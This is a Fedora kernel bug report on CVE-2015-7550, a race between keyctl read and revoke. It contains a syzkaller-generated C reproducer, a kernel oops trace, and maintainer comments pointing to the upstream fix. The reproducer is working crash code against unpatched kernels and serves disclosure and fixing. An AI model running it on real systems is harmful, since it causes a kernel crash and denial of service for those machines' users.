Bug 1290370 - kernel: GPF in keyctl
Summary: kernel: GPF in keyctl
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: None
Product: Fedora
Classification: Fedora
Component: kernel
Version: rawhide
Hardware: Unspecified
OS: Unspecified
Priority: unspecified
Severity: high
Target Milestone: ---
Assignee: David Howells
QA Contact: Fedora Extras Quality Assurance
URL:
Whiteboard:
Depends On:
Blocks: CVE-2015-7550
 
Reported: 2015-12-10 10:50 UTC by Dmitry Vyukov
Modified: 2016-05-27 14:16 UTC
CC List: 7 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2016-05-27 14:16:40 UTC
Type: Bug
Embargoed:


Attachments
Simplified testcase (948 bytes, text/x-csrc), 2015-12-10 17:00 UTC, David Howells
Patch to fix race between read and revoke (2.90 KB, patch), 2015-12-11 17:53 UTC, David Howells

Description Dmitry Vyukov 2015-12-10 10:50:17 UTC
On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9).

The following program causes GPF in keyctl:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <sys/syscall.h>
#include <unistd.h>     /* declares syscall(); without it current compilers reject the implicit declaration */
#include <string.h>
#include <stdint.h>
#include <pthread.h>

long r4;   /* serial number of the key created in main(), shared by the racing threads */

/* keyctl(KEYCTL_REVOKE = 0x3, key) */
void *thr0(void *arg)
{
	long r5 = syscall(SYS_keyctl, 0x3ul, r4, 0, 0, 0, 0);
	(void)r5;
	return 0;
}

/* keyctl(KEYCTL_READ = 0xb, key, buffer = 0x20000000, buflen = 0x1000) */
void *thr1(void *arg)
{
	long r6 = syscall(SYS_keyctl, 0xbul, r4, 0x20000000ul, 0x1000ul, 0, 0);
	(void)r6;
	return 0;
}

int main()
{
	/* fixed anonymous mapping at 0x20000000: PROT_READ|PROT_WRITE (0x3),
	 * MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (0x32); holds the syscall arguments below */
	long r0 = syscall(SYS_mmap, 0x20000000ul, 0x10000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
	(void)r0;
	memcpy((void*)0x20000e56, "\x75\x73\x65\x72\x00", 5);   /* key type: "user" */
	memcpy((void*)0x2000074a, "\x25\x00", 2);                /* key description: "%" */
	/* 137 bytes (0x89) of random payload */
	memcpy((void*)0x20000f77, "\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e", 137);
	/* add_key("user", "%", payload, 137, KEY_SPEC_USER_KEYRING (-4)) */
	r4 = syscall(SYS_add_key, 0x20000e56ul, 0x2000074aul, 0x20000f77ul, 0x89ul, 0xfffffffffffffffcul, 0);
	/* two revokers and two readers racing on the same key */
	pthread_t th[5];
	pthread_create(&th[0], 0, thr0, 0);
	pthread_create(&th[1], 0, thr1, 0);
	pthread_create(&th[2], 0, thr0, 0);
	pthread_create(&th[3], 0, thr1, 0);
	pthread_join(th[0], 0);
	pthread_join(th[1], 0);
	pthread_join(th[2], 0);
	pthread_join(th[3], 0);
	return 0;
}


BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
PGD 35b9b067 PUD 34c71067 PMD 0
Oops: 0000 [#1] SMP
Modules linked in:
CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000
RIP: 0010:[<ffffffff816870b7>]  [<ffffffff816870b7>] user_read+0x37/0xb0
RSP: 0018:ffff8800364f3ee0  EFLAGS: 00010206
RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001
RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000
RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001
R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000
R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000
FS:  00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0
Stack:
 ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000
 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000
 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48
Call Trace:
 [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761
 [<     inline     >] SYSC_keyctl security/keys/keyctl.c:1595
 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553
 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185
Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48
RIP  [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
 RSP <ffff8800364f3ee0>
CR2: 0000000000000010
---[ end trace acbace9643063ebd ]---

Comment 1 David Howells 2015-12-10 17:00:09 UTC
Created attachment 1104416 [details]
Simplified testcase

Here's a cleaned-up version of the testcase.

Comment 2 David Howells 2015-12-10 17:01:29 UTC
Compile the cleaned-up testcase with:

    make keyctl-gpf LDLIBS="-lpthread -lkeyutils"

Comment 3 David Howells 2015-12-11 17:53:06 UTC
Created attachment 1104753 [details]
Patch to fix race between read and revoke

Comment 4 Josh Boyer 2015-12-14 15:23:59 UTC
(In reply to David Howells from comment #3)
> Created attachment 1104753 [details]
> Patch to fix race between read and revoke

This probably needs the "Cc: stable.org" tag in the commit log when you send it upstream.

Comment 5 Josh Boyer 2016-05-27 14:16:40 UTC
This went upstream as commit b4a1b4f5047e4f54e194681125c74c0aa64d637d

